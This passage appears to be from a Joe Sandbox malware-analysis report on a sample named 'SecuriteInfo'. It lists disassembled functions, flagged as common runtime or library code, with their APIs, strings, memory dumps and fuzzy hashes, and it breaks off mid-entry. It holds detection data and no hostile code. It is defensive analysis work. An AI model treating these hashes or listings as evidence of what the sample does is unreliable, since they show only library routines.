                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                                      • String ID: csm$csm$csm
                                                                                                      • API String ID: 3523768491-393685449
                                                                                                      • Opcode ID: 01dbbc9fa7db250a30567b4084371a2519905c46085f65ccfdfdc91a1e3e9cb2
                                                                                                      • Instruction ID: 1c2aba3fb4f444a54d0386c91b3ddae66c2364e2a0e963701feb8304df0947da
                                                                                                      • Opcode Fuzzy Hash: 01dbbc9fa7db250a30567b4084371a2519905c46085f65ccfdfdc91a1e3e9cb2
                                                                                                      • Instruction Fuzzy Hash: 2BE1BF32A297829AE7209F25D4802AD3FA4FB4478AF140136DBCDD7696DE3CE681C741
                                                                                                      Function 00007FF6C787ACF8 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32 ref: 00007FF6C787AD07
                                                                                                      • FlsSetValue.KERNEL32(?,?,000078636391DE6C,00007FF6C7874BCD,?,?,?,?,00007FF6C78829BE,?,?,00000000,00007FF6C7887C0B,?,?,?), ref: 00007FF6C787AD3D
                                                                                                      • FlsSetValue.KERNEL32(?,?,000078636391DE6C,00007FF6C7874BCD,?,?,?,?,00007FF6C78829BE,?,?,00000000,00007FF6C7887C0B,?,?,?), ref: 00007FF6C787AD6A
                                                                                                      • FlsSetValue.KERNEL32(?,?,000078636391DE6C,00007FF6C7874BCD,?,?,?,?,00007FF6C78829BE,?,?,00000000,00007FF6C7887C0B,?,?,?), ref: 00007FF6C787AD7B
                                                                                                      • FlsSetValue.KERNEL32(?,?,000078636391DE6C,00007FF6C7874BCD,?,?,?,?,00007FF6C78829BE,?,?,00000000,00007FF6C7887C0B,?,?,?), ref: 00007FF6C787AD8C
                                                                                                      • SetLastError.KERNEL32 ref: 00007FF6C787ADA7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Value$ErrorLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 2506987500-0
                                                                                                      • Opcode ID: 1fea778e53617e423dd93e48fc1f81946f1e74507dbde76822a8039bb3b95012
                                                                                                      • Instruction ID: 80cc7da8161ee1f316e2fb9ba9287476eac33405f6521d3fc364b7396fc8471e
                                                                                                      • Opcode Fuzzy Hash: 1fea778e53617e423dd93e48fc1f81946f1e74507dbde76822a8039bb3b95012
                                                                                                      • Instruction Fuzzy Hash: 97116020B0F64742FA586F2595990796E42AF44BB3F148734FBBFC6AD6DE6CB8414301
                                                                                                      Function 00007FF6C78645A0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 240COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                      • String ID: false$true
                                                                                                      • API String ID: 118556049-2658103896
                                                                                                      • Opcode ID: ad251babf673da30d347f085cc8932aed423ad9c8062fdcdc27bd164a5557edd
                                                                                                      • Instruction ID: 9c3b5dffb009715c6b28aae0e1ae1bef41e5f7c4926001bd09a964026f14e404
                                                                                                      • Opcode Fuzzy Hash: ad251babf673da30d347f085cc8932aed423ad9c8062fdcdc27bd164a5557edd
                                                                                                      • Instruction Fuzzy Hash: 3E91BE22B2AA45A5EB10DF61D4402AD3BA5FB48B89F050235DF9CD7B89EF38D606C340
                                                                                                      Function 00007FF6C7851D40 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 115COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: std::_$Lockit$GetctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                      • String ID: bad locale name
                                                                                                      • API String ID: 2967684691-1405518554
                                                                                                      • Opcode ID: 591d2bd700e3465a55b0f9c6b706778e586fa78e76f39de4335fe8b1c86bd814
                                                                                                      • Instruction ID: 8039a9988a17227295e43dff52e878cf125b39ea72819ba0175d258cf15ef7b6
                                                                                                      • Opcode Fuzzy Hash: 591d2bd700e3465a55b0f9c6b706778e586fa78e76f39de4335fe8b1c86bd814
                                                                                                      • Instruction Fuzzy Hash: 98414B22F0AB419AFB54DFB0E4902BC3B74AF44789F044434DF8EA6A99DF38D6569344
                                                                                                      Function 00007FF6C786D39C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                      • Opcode ID: 52527351ef27f021aaa8f573abae1b0b21d611b2d1a853a631961c83de09e1b0
                                                                                                      • Instruction ID: f3548e9776c26b80910fafd43dcf7281f991caf3e35105587e1bd2666e509aaa
                                                                                                      • Opcode Fuzzy Hash: 52527351ef27f021aaa8f573abae1b0b21d611b2d1a853a631961c83de09e1b0
                                                                                                      • Instruction Fuzzy Hash: CFF06221A1A70691EE148F64E8453796B20EF58762F544339C7EEC65E4DF2DD549C310
                                                                                                      Function 00007FF6C7869CFC Relevance: 7.8, APIs: 5, Instructions: 290COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AdjustPointer
                                                                                                      • String ID:
                                                                                                      • API String ID: 1740715915-0
                                                                                                      • Opcode ID: 877bf174ddecd7ac3561e44ad8c4d5f8fbcb89db0df3b071f6ae755d8025f88d
                                                                                                      • Instruction ID: 76bb677798dc4898599f1634ad58b2c4bb76ecf757072a97aab46789c142ce06
                                                                                                      • Opcode Fuzzy Hash: 877bf174ddecd7ac3561e44ad8c4d5f8fbcb89db0df3b071f6ae755d8025f88d
                                                                                                      • Instruction Fuzzy Hash: 3DB1BF22A2FA42A1EE65DF15D5446386E91BF44B82F09843ADBCDC77C9DE7CE642C301
                                                                                                      Function 00007FF6C7851670 Relevance: 7.7, APIs: 5, Instructions: 199COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task__std_exception_copy__std_exception_destroy
                                                                                                      • String ID:
                                                                                                      • API String ID: 1087005451-0
                                                                                                      • Opcode ID: 8fa2abb8088aa9f0719ea070cc18897ded193e99f4aa0bbb3f6ea83d37c04bf7
                                                                                                      • Instruction ID: 9dcd4fd3cb45f5d5bfd1bd870fc0c525b4b5c04f81c5e6526af4824f95e3bd95
                                                                                                      • Opcode Fuzzy Hash: 8fa2abb8088aa9f0719ea070cc18897ded193e99f4aa0bbb3f6ea83d37c04bf7
                                                                                                      • Instruction Fuzzy Hash: 4E81D322F1AB4295FB108FB4E4403FC3762AB547E9F504235DFAD96B96EE38A195C340
                                                                                                      Function 00007FF6C787FCA0 Relevance: 7.7, APIs: 5, Instructions: 196COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _set_statfp
                                                                                                      • String ID:
                                                                                                      • API String ID: 1156100317-0
                                                                                                      • Opcode ID: 18f451fe96e633c4b295cbaae9d38249d0eacf18a30165643d3191e187d5effb
                                                                                                      • Instruction ID: b52e2a0b690948682e6c08504aa988dcfc6cd151b5cf0cccccc984e62af457ac
                                                                                                      • Opcode Fuzzy Hash: 18f451fe96e633c4b295cbaae9d38249d0eacf18a30165643d3191e187d5effb
                                                                                                      • Instruction Fuzzy Hash: D681D312B1AA4689F2728F36A48437A6E90BF55396F144231FBDFA65D5DF3CE483C600
                                                                                                      Function 00007FF6C788D458 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _set_statfp
                                                                                                      • String ID:
                                                                                                      • API String ID: 1156100317-0
                                                                                                      • Opcode ID: e65ba792651367d839098e214d5891407b2dde01c0b567b7a4e043ebbfca8b6f
                                                                                                      • Instruction ID: cf97d5a2108f38eca5591fa43a2e295be1ecc46c8a300bce5de7e7e28c2ed4ff
                                                                                                      • Opcode Fuzzy Hash: e65ba792651367d839098e214d5891407b2dde01c0b567b7a4e043ebbfca8b6f
                                                                                                      • Instruction Fuzzy Hash: 4111E322F8EA1301F6A45F28D55737509806F99372F1D46B6EBEFD72DACE2CB8814120
                                                                                                      Function 00007FF6C787ADC0 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • FlsGetValue.KERNEL32(?,?,?,00007FF6C787471B,?,?,00000000,00007FF6C78749B6,?,?,?,?,?,00007FF6C7874942), ref: 00007FF6C787ADDF
                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF6C787471B,?,?,00000000,00007FF6C78749B6,?,?,?,?,?,00007FF6C7874942), ref: 00007FF6C787ADFE
                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF6C787471B,?,?,00000000,00007FF6C78749B6,?,?,?,?,?,00007FF6C7874942), ref: 00007FF6C787AE26
                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF6C787471B,?,?,00000000,00007FF6C78749B6,?,?,?,?,?,00007FF6C7874942), ref: 00007FF6C787AE37
                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF6C787471B,?,?,00000000,00007FF6C78749B6,?,?,?,?,?,00007FF6C7874942), ref: 00007FF6C787AE48
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Value
                                                                                                      • String ID:
                                                                                                      • API String ID: 3702945584-0
                                                                                                      • Opcode ID: d187414ded89b92ad3fb913650dc6829c15d42d8e5d1f32f0a821160ba34cb20
                                                                                                      • Instruction ID: 957593ddccfb8fa778482d3e5ea9bd26cac9bb820b0ce98c8a384fb455e9b1b8
                                                                                                      • Opcode Fuzzy Hash: d187414ded89b92ad3fb913650dc6829c15d42d8e5d1f32f0a821160ba34cb20
                                                                                                      • Instruction Fuzzy Hash: E3114F21F0F64642FA586F29A99517A5D426F44BB2F048734FBBFC6AD6DE2CB8414301
                                                                                                      Function 00007FF6C787AC54 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Value
                                                                                                      • String ID:
                                                                                                      • API String ID: 3702945584-0
                                                                                                      • Opcode ID: 588ac2239229576a197fccb85acd9342fb7599446a90882bc53e90458ad91cec
                                                                                                      • Instruction ID: df7f56cc917248836cfd2a90151f0aa797236fba72524576ef14f613448758b9
                                                                                                      • Opcode Fuzzy Hash: 588ac2239229576a197fccb85acd9342fb7599446a90882bc53e90458ad91cec
                                                                                                      • Instruction Fuzzy Hash: B7113C20F0F24742F9686F2948561791D426F85B77E184734FBBFCA7D6ED6CB8404252
                                                                                                      Function 00007FF6C7881C18 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 212COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                      • API String ID: 3215553584-1196891531
                                                                                                      • Opcode ID: 7c0a9480b9e258cadcf2abe377386dc5345d05869c1da105d4508b908ec5b2bf
                                                                                                      • Instruction ID: 948d2c77b09251d218d9af8ea4d9fa71f72e3f441d65aaba2e7b1f1d56cddf22
                                                                                                      • Opcode Fuzzy Hash: 7c0a9480b9e258cadcf2abe377386dc5345d05869c1da105d4508b908ec5b2bf
                                                                                                      • Instruction Fuzzy Hash: C181A032E0E20286F7658F2982583792ED19F117DAF55553FCB8EC66D9CE2DA8419301
                                                                                                      Function 00007FF6C786B070 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CallEncodePointerTranslator
                                                                                                      • String ID: MOC$RCC
                                                                                                      • API String ID: 3544855599-2084237596
                                                                                                      • Opcode ID: 9b1374c6934cf619966cd656eb24c3807a1de378a26e39886319f72bbcd0075f
                                                                                                      • Instruction ID: 217edc3f4f5f0fd013942d7a81041c55e7368a924248529cedbbfe89424bc294
                                                                                                      • Opcode Fuzzy Hash: 9b1374c6934cf619966cd656eb24c3807a1de378a26e39886319f72bbcd0075f
                                                                                                      • Instruction Fuzzy Hash: 8791AD73A297819AE710CF65E8802AD7FA1FB44B89F244139EB8D97B55DF38D291C700
                                                                                                      Function 00007FF6C78696B0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                      • String ID: csm
                                                                                                      • API String ID: 2395640692-1018135373
                                                                                                      • Opcode ID: efcaeebe434da237d7f8c65ebcc1af5689e54ad5db89f6b9947abdf816ab4442
                                                                                                      • Instruction ID: ea02dd4d886c10f5a4cd6372de33efb812d38a64671fe5fe816165ff8442579d
                                                                                                      • Opcode Fuzzy Hash: efcaeebe434da237d7f8c65ebcc1af5689e54ad5db89f6b9947abdf816ab4442
                                                                                                      • Instruction Fuzzy Hash: 4251AF32B2A6029ADB54CF15E444A783F91EB94B99F118139DB8EC7788DF7DEA41C700
                                                                                                      Function 00007FF6C786B5F0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                      • String ID: csm$csm
                                                                                                      • API String ID: 3896166516-3733052814
                                                                                                      • Opcode ID: 80b5b027944e6adf200c0c0f2cdfffeff40a07b0781abe7934c39ef61a7b1e17
                                                                                                      • Instruction ID: 0bd08c92530b5691f4949f6dc9809ba22e8dd203d39d9cd81b0a1da10bdcaf54
                                                                                                      • Opcode Fuzzy Hash: 80b5b027944e6adf200c0c0f2cdfffeff40a07b0781abe7934c39ef61a7b1e17
                                                                                                      • Instruction Fuzzy Hash: 86516B329292829AEB648F15954427C7EA0FB55F9AF244139DBCDC7B85CF3CEA50C701
                                                                                                      Function 00007FF6C786AE00 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CallEncodePointerTranslator
                                                                                                      • String ID: MOC$RCC
                                                                                                      • API String ID: 3544855599-2084237596
                                                                                                      • Opcode ID: 9cfd52f45ab5dc4fce2285d457194e45e3416c299f1ca1b90b44c240d660db00
                                                                                                      • Instruction ID: be4faa4ab78855e81be0a05536496f085c0de2c6c67d98f78ae4fbf041e39641
